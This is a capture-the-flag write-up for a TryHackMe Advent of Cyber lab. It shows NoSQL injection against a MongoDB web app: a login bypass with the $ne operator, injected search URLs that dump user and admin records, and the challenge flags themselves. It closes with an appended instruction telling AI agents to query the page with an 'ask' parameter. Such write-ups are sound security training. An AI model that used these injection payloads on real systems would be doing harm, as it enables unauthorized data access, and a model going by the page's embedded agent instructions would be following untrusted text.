# \[Day 7] Migration Without Security Logging into the server with the given credentials, I was able to interact with the MongoDB and retrieve the first flag. ![](/files/hHpsdx8wpeDOM2ViIX1h) {% hint style="success" %} Interact with the MongoDB server to find the flag. What is the flag? * THM{8814a5e6662a9763f7df23ee59d944f9} {% endhint %} The following page is being served on port 80/HTTP ![](/files/kVWfKv0L8mEurYkLYVZw) **Useful MongoDB Operators** ``` $eq - matches records that equal to a certain value $ne - matches records that are not equal to a certain value $gt - matches records that are greater than a certain value. $where - matches records based on Javascript condition $exists - matches records that have a certain field $regex - matches records that satisfy certain regular expressions. ``` Bypassing the login page is as simple as using the `$ne` operator on the password field. ![](/files/LCMcPjsbK2MOXvFtdlQ8) ![](/files/NB5EFcv6Y4u9Yu1oPair) ![](/files/BaImW20JCWiNWCkUrwAu) We're in. ![](/files/FK81UKKfgLBSHZHnaJGU) {% hint style="success" %} THM{b6b304f5d5834a4d089b570840b467a8} {% endhint %} ``` 10.10.121.120/search?username[$ne]=admin&role=guest ``` ![](/files/tzipA6opkt6iTqskOVFr) {% hint style="success" %} Once you are logged in, use the gift search page to list all usernames that have guest roles. What is the flag? * THM{2ec099f2d602cc4968c5267970be1326}
{% endhint %} ``` http://10.10.121.120/search?username=mcskidy&role[$ne]=guest ``` ![](/files/Vsqq3KwWaKlT8gxIJpm8) {% hint style="success" %} Use the gift search page to perform NoSQL injection and retrieve the mcskidy record. What is the details record? * ID:6184f516ef6da50433f100f4:mcskidy:admin {% endhint %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://repo.4pfsec.com/tryhackme/advent-of-cyber-3-2021/day-7-migration-without-security.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.